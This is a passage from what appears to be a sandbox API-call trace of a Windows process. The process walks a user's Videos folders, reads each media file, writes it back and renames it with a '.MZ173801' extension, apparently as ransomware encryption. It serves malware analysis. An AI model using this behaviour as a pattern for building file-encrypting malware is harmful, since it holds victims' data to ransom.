DQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.952] GetCurrentThreadId () returned 0x1358 [0119.952] GetCurrentThreadId () returned 0x1358 [0119.952] GetCurrentThreadId () returned 0x1358 [0119.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.952] GetCurrentThreadId () returned 0x1358 [0119.952] GetCurrentThreadId () returned 0x1358 [0119.952] GetCurrentThreadId () returned 0x1358 [0119.953] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\f_4h9eckCbvZmLv.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\f_4h9eckcbvzmlv.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.953] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0119.953] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.953] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x1257c [0119.953] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.953] ReadFile (in: hFile=0x408, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1257c, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0x1257c, lpOverlapped=0x0) returned 1 [0119.954] CloseHandle (hObject=0x408) returned 1 [0119.955] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\f_4h9eckCbvZmLv.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\f_4h9eckcbvzmlv.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.956] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x1257c, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0x1257c, lpOverlapped=0x0) returned 1 [0120.376] CloseHandle (hObject=0x408) returned 1 [0120.421] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\f_4h9eckCbvZmLv.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\f_4h9eckcbvzmlv.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\f_4h9eckCbvZmLv.mp4.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\f_4h9eckcbvzmlv.mp4.mz173801")) returned 1 [0120.422] GetCurrentThreadId () returned 0x1358 [0120.422] GetCurrentThreadId () returned 0x1358 [0120.422] GetCurrentThreadId () returned 0x1358 [0120.422] GetCurrentThreadId () returned 0x1358 [0120.422] GetCurrentThreadId () returned 0x1358 [0120.422] GetCurrentThreadId () returned 0x1358 [0120.422] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9e1b0, ftCreationTime.dwHighDateTime=0x1d5ea42, ftLastAccessTime.dwLowDateTime=0xd486a390, ftLastAccessTime.dwHighDateTime=0x1d5e414, ftLastWriteTime.dwLowDateTime=0xd486a390, ftLastWriteTime.dwHighDateTime=0x1d5e414, nFileSizeHigh=0x0, nFileSizeLow=0x15a5c, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="ky0-S969NuCh.mkv", cAlternateFileName="KY0-S9~1.MKV")) returned 1 [0120.422] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0120.422] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0120.422] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\ky0-S969NuCh.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\ky0-s969nuch.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9e1b0, ftCreationTime.dwHighDateTime=0x1d5ea42, ftLastAccessTime.dwLowDateTime=0xd486a390, ftLastAccessTime.dwHighDateTime=0x1d5e414, ftLastWriteTime.dwLowDateTime=0xd486a390, ftLastWriteTime.dwHighDateTime=0x1d5e414, nFileSizeHigh=0x0, nFileSizeLow=0x15a5c)) returned 1 [0120.423] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.423] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0120.423] GetCurrentThreadId () returned 0x1358 [0120.423] GetCurrentThreadId () returned 0x1358 [0120.423] GetCurrentThreadId () returned 0x1358 [0120.423] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.423] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0120.424] GetCurrentThreadId () returned 0x1358 [0120.424] GetCurrentThreadId () returned 0x1358 [0120.424] GetCurrentThreadId () returned 0x1358 [0120.424] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\ky0-S969NuCh.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\ky0-s969nuch.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0120.424] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0120.424] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0120.424] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x15a5c [0120.424] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0120.424] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x15a5c, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0x15a5c, lpOverlapped=0x0) returned 1 [0120.425] CloseHandle (hObject=0x408) returned 1 [0120.427] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\ky0-S969NuCh.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\ky0-s969nuch.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0120.428] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x15a5c, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0x15a5c, lpOverlapped=0x0) returned 1 [0120.430] CloseHandle (hObject=0x408) returned 1 [0120.433] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\ky0-S969NuCh.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\ky0-s969nuch.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\ky0-S969NuCh.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\ky0-s969nuch.mkv.mz173801")) returned 1 [0120.434] GetCurrentThreadId () returned 0x1358 [0120.434] GetCurrentThreadId () returned 0x1358 [0120.434] GetCurrentThreadId () returned 0x1358 [0120.434] GetCurrentThreadId () returned 0x1358 [0120.434] GetCurrentThreadId () returned 0x1358 [0120.434] GetCurrentThreadId () returned 0x1358 [0120.434] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe051a170, ftCreationTime.dwHighDateTime=0x1d5ee78, ftLastAccessTime.dwLowDateTime=0xc939d6a0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0xc939d6a0, ftLastWriteTime.dwHighDateTime=0x1d5e2d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="v4vV8", cAlternateFileName="")) returned 1 [0120.434] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68df9520, ftCreationTime.dwHighDateTime=0x1d5e4be, ftLastAccessTime.dwLowDateTime=0x2dfb3250, ftLastAccessTime.dwHighDateTime=0x1d5ec9f, ftLastWriteTime.dwLowDateTime=0x2dfb3250, ftLastWriteTime.dwHighDateTime=0x1d5ec9f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="VmAilK6Ug", cAlternateFileName="VMAILK~1")) returned 1 [0120.434] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19aefc60, ftCreationTime.dwHighDateTime=0x1d5e4a6, ftLastAccessTime.dwLowDateTime=0x7b7c4e20, ftLastAccessTime.dwHighDateTime=0x1d5e4e7, ftLastWriteTime.dwLowDateTime=0x7b7c4e20, ftLastWriteTime.dwHighDateTime=0x1d5e4e7, nFileSizeHigh=0x0, nFileSizeLow=0x16a89, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="zR2L-Z.flv", cAlternateFileName="")) returned 1 [0120.434] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0120.434] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0120.434] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\zR2L-Z.flv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\zr2l-z.flv"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19aefc60, ftCreationTime.dwHighDateTime=0x1d5e4a6, ftLastAccessTime.dwLowDateTime=0x7b7c4e20, ftLastAccessTime.dwHighDateTime=0x1d5e4e7, ftLastWriteTime.dwLowDateTime=0x7b7c4e20, ftLastWriteTime.dwHighDateTime=0x1d5e4e7, nFileSizeHigh=0x0, nFileSizeLow=0x16a89)) returned 1 [0120.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 